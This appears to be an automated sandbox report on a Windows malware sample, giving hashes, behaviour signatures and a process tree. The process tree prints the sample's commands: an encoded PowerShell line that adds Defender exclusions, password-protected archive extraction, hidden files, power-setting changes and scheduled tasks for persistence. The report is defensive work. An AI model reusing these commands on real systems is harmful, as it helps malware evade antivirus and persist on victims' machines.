Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2023 01:03

General

  • Target

    0c648321522607509014810fa9850703.exe

  • Size

    2.5MB

  • MD5

    0c648321522607509014810fa9850703

  • SHA1

    637691d6383617223d3e560dca72cb47cd9df0e8

  • SHA256

    76465863089ece91dfcafbcf35b4129659eee5bb53ac9a9add3b95c77c9022fc

  • SHA512

    e9476fecdaafb141e77500878c2f5503a19ca810ffa5cf5bccf28599242f7a32021ea840aac7d174a3fff4d64131aca3ac9779b2b6f8cc96301befa55b15ed2f

  • SSDEEP

    49152:Co5P6mI0jX9MTqoQQzLrk3PxbFszLJpRgmjXB2LtBasOrlSi0GTIzVIBDwN3CX/T:Co5RM5zc3PxezrjXM+skSqIqeNK

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c648321522607509014810fa9850703.exe
    "C:\Users\Admin\AppData\Local\Temp\0c648321522607509014810fa9850703.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:224
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:4084
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p199921163012031144012778512725 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4500
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2860
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3944
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4652
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:364
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
        • C:\Windows\system32\attrib.exe
          attrib +H "Installer.exe"
          3⤵
          • Views/modifies file attributes
          PID:3696
        • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
          "Installer.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3804
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C powershell -EncodedCommand "PAAjAGUAagBwAEMAQgBSADMAQQA4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATQAxAEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAWQBNAGEAaABKAGYANQBUADYAMQBOACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIAMwBMAG8AWQBuAGgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4116
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAGUAagBwAEMAQgBSADMAQQA4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATQAxAEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAWQBNAGEAaABKAGYANQBUADYAMQBOACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIAMwBMAG8AWQBuAGgAIwA+AA=="
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3644
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7458" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4228
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7458" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:4688
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3324
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:1624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5sxuwy0.rca.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

      Filesize

      21KB

      MD5

      8094e61800a5461f723754cda0d85aa1

      SHA1

      1250dc65a0861507d8885d3a404b9c71a3fa306d

      SHA256

      26d81f5d1ac64ffe6fd03f77030b99c890194a0affa5c34fb2e0c20f4add6353

      SHA512

      6da9fc8490af86df2037f691ff87c989c6c79ba600aa7cf42a17a77cf6ddd61b40c6a8dad4476d301a6505480f788f6ae41df0370b7fa6ccf2a835cf7ae80be0

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

      Filesize

      2.1MB

      MD5

      a217b3a8813052306f4f2b0a9ac1dfd7

      SHA1

      f3f3bd5fb49a50a057abc23ff66ed9663fce7251

      SHA256

      77d349afa0f3690f56a9c55f2ab3daf74f5cbecf8df33682e469ce1638cde633

      SHA512

      9a9e507af0916e2eed7e9d070f06a47774ce983d2ddb64e40170d4ec8d26c8ef91aa788bd87d38276397352354cf40c67d31720e2eceee818c4192f827729815

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

      Filesize

      21KB

      MD5

      8094e61800a5461f723754cda0d85aa1

      SHA1

      1250dc65a0861507d8885d3a404b9c71a3fa306d

      SHA256

      26d81f5d1ac64ffe6fd03f77030b99c890194a0affa5c34fb2e0c20f4add6353

      SHA512

      6da9fc8490af86df2037f691ff87c989c6c79ba600aa7cf42a17a77cf6ddd61b40c6a8dad4476d301a6505480f788f6ae41df0370b7fa6ccf2a835cf7ae80be0

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

      Filesize

      9KB

      MD5

      e12b7f891dde680e5950ce87df5455fb

      SHA1

      2b1a3d9e8c6f77f3604fdcbb036ba157cce9daee

      SHA256

      4ed1c0b9af10c6a8c90c4e656de8f2aea25858f9f2e9df1f4640649450db95cd

      SHA512

      aaee8c07fcfd1c5e7aab8cf20908cda86e470661b0e1c4529a5ae903834301845b70de99ccc491b3e4a1e0f1744681ab9e20f6ece82da8ed3a7e714b9971b9ef

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

      Filesize

      9KB

      MD5

      e1cd221e697ce29ca70f2c689213153d

      SHA1

      3c875cd14fe3134a28eb1d83982422b696ef802b

      SHA256

      f13f5eee8887618bf50ac16689866c4a6dc94e61ac5a27b941c07e2a6aff849b

      SHA512

      5451c2c073dc186da0705317291d31a5061b4c4d9099885528f5d38b44ac7e201b0f6dd1b291aa7ed35ab8949014723da6368311ac4335c7c80c42523f4a7956

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

      Filesize

      9KB

      MD5

      8631891243067625145a9fba7f2a15b6

      SHA1

      772c3baa15bdde6072af2b11c4561fe65bb0f8a4

      SHA256

      2b52cea36c8238b91b4874dcdaef6cecdcae55697b10e88557e107ecc7ab3757

      SHA512

      4aae821f78c4006e3dd645cc2bd32168a71d103058475d8f6daf849399e04fdcc0d7f808633528458eaa3a7cbd6bc1d12767d469d4d9cac9afec5637425a59be

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

      Filesize

      9KB

      MD5

      e4e6029fb1592f4b0d980a1da68001b1

      SHA1

      c67a1c93cb37f2ab3b99baeb3ff24def54a25519

      SHA256

      496645b31890b89f1c580fb67de0e17fd941c856bdc90baeabd71c5b1ae297af

      SHA512

      1912f9bcdab5cfe833dfd694cd7c72743c122ca3b62ab1d4c89442bf466f225c863262f470faf161a4bda2a590c37040d25708bb3228980caf469a69b31019f4

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

      Filesize

      1.6MB

      MD5

      f23275793fbdcd6d6ad91221dd482799

      SHA1

      daee133d2b751668ff7dbe2d1fabb0fc25ac8b39

      SHA256

      20b2dd95c812adcedf04e5ca14b9e90ec047df4bff8bcffaae4f3eed1d789be1

      SHA512

      f815ba5626f6ccc4f1bd408cec40418ed57a6a4d925c5946d82e839ed3797aeea05d0bc32aeedb1eb0b179ca8495858374a90fd7a1676543e0bd801c8ed9e879

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

      Filesize

      1.6MB

      MD5

      1ae10fd8ae5314f4034d0b08f1cb86eb

      SHA1

      276a63551092638c5f7468648928a994a27b3447

      SHA256

      3d7df2ab3035b67f9770785350cf8cb9bc6c6c396166f59055430fa003c49b43

      SHA512

      678cc38b1bc0f974e32b976d9c6ed3d055df03cd96e8205f8ba75eea7a84743a9a9bd92eb68f8fdaf89862e50b8f77a19931596bb17c59ae721eac4b99ab221d

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

      Filesize

      476B

      MD5

      4fd8c0be3d5734a0efec73ad50927f94

      SHA1

      9c7e04c72e448804b0d2bc76d94e7646d16aefb9

      SHA256

      172a4b8e026cdd3274d4f494528a7b8193dab2b5d8a5bbc2a19d7f997661cf98

      SHA512

      c9a4ad6d7bacd1e2e6e8298ca041e715240ae2d1d36867cc3a9c174703011a803998f2e35e4b41ab6d5cd799730d435665e08f54a8478f770d839a9cf6f8ed94

    • memory/3644-99-0x0000000006E30000-0x0000000006E4E000-memory.dmp

      Filesize

      120KB

    • memory/3644-84-0x0000000005400000-0x0000000005410000-memory.dmp

      Filesize

      64KB

    • memory/3644-112-0x0000000072FE0000-0x0000000073790000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-109-0x0000000007E10000-0x0000000007E18000-memory.dmp

      Filesize

      32KB

    • memory/3644-108-0x0000000007ED0000-0x0000000007EEA000-memory.dmp

      Filesize

      104KB

    • memory/3644-107-0x0000000007DD0000-0x0000000007DE4000-memory.dmp

      Filesize

      80KB

    • memory/3644-62-0x0000000005280000-0x00000000052B6000-memory.dmp

      Filesize

      216KB

    • memory/3644-63-0x0000000072FE0000-0x0000000073790000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-64-0x0000000005400000-0x0000000005410000-memory.dmp

      Filesize

      64KB

    • memory/3644-65-0x0000000005400000-0x0000000005410000-memory.dmp

      Filesize

      64KB

    • memory/3644-66-0x0000000005A40000-0x0000000006068000-memory.dmp

      Filesize

      6.2MB

    • memory/3644-67-0x00000000059C0000-0x00000000059E2000-memory.dmp

      Filesize

      136KB

    • memory/3644-68-0x00000000060E0000-0x0000000006146000-memory.dmp

      Filesize

      408KB

    • memory/3644-106-0x0000000007DC0000-0x0000000007DCE000-memory.dmp

      Filesize

      56KB

    • memory/3644-78-0x00000000063B0000-0x0000000006704000-memory.dmp

      Filesize

      3.3MB

    • memory/3644-79-0x0000000006850000-0x000000000686E000-memory.dmp

      Filesize

      120KB

    • memory/3644-80-0x0000000006890000-0x00000000068DC000-memory.dmp

      Filesize

      304KB

    • memory/3644-105-0x0000000007D90000-0x0000000007DA1000-memory.dmp

      Filesize

      68KB

    • memory/3644-88-0x0000000007820000-0x0000000007852000-memory.dmp

      Filesize

      200KB

    • memory/3644-89-0x000000006F600000-0x000000006F64C000-memory.dmp

      Filesize

      304KB

    • memory/3644-104-0x0000000007E30000-0x0000000007EC6000-memory.dmp

      Filesize

      600KB

    • memory/3644-100-0x0000000007A60000-0x0000000007B03000-memory.dmp

      Filesize

      652KB

    • memory/3644-101-0x00000000081C0000-0x000000000883A000-memory.dmp

      Filesize

      6.5MB

    • memory/3644-102-0x0000000007B80000-0x0000000007B9A000-memory.dmp

      Filesize

      104KB

    • memory/3644-103-0x0000000007C10000-0x0000000007C1A000-memory.dmp

      Filesize

      40KB

    • memory/3804-56-0x0000000072FE0000-0x0000000073790000-memory.dmp

      Filesize

      7.7MB

    • memory/3804-57-0x00000000054D0000-0x0000000005A74000-memory.dmp

      Filesize

      5.6MB

    • memory/3804-55-0x0000000000510000-0x000000000051C000-memory.dmp

      Filesize

      48KB

    • memory/3804-61-0x00000000051A0000-0x0000000005206000-memory.dmp

      Filesize

      408KB

    • memory/3804-60-0x00000000050C0000-0x00000000050CA000-memory.dmp

      Filesize

      40KB

    • memory/3804-59-0x0000000005120000-0x0000000005130000-memory.dmp

      Filesize

      64KB

    • memory/3804-58-0x0000000004F20000-0x0000000004FB2000-memory.dmp

      Filesize

      584KB

    • memory/3804-115-0x0000000072FE0000-0x0000000073790000-memory.dmp

      Filesize

      7.7MB

    • memory/3804-116-0x0000000005120000-0x0000000005130000-memory.dmp

      Filesize

      64KB

    • memory/3804-117-0x0000000072FE0000-0x0000000073790000-memory.dmp

      Filesize

      7.7MB